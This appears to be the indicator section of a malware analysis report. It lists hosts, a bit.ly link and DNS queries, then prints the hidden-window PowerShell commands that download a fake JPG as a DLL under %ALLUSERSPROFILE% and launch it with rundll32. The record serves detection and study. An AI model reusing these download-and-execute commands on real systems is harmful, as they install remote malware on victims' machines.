Technical Information
- http://www.zedocaixao2016.xpg.com.br/site/img001.jpg as %allusersprofile%\ysftzdfusrip_user\ysftzdfusrip_user_sfskw.dll
- http://bit.ly/1hu0faz
- 'bi#.ly':80
- 'go###e.com.br':80
- http://bi#.ly/1HU0fAz
- http://www.go###e.com.br/zegoiano2016.xpg
- DNS ASK bi#.ly
- DNS ASK ze######ao2016.xpg.com.br
- DNS ASK go###e.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-objecT sysTem.neT.webclienT).downloadfile('""http://www.zedocaixao2016.xpg.com.br/site/img001.jpg','%ALLUSERSPROFILE%\ysftzdfusrip_user\ysftzdfusrip_user_sfskw.dll');sTarT-process rundll32...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-objecT neT.webclienT).downloadsTring('http://bit.ly/1HU0fAz')"' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %ALLUSERSPROFILE%\ysftzdfusrip_user\ysftzdfusrip_user_sfskw.dll dlgProc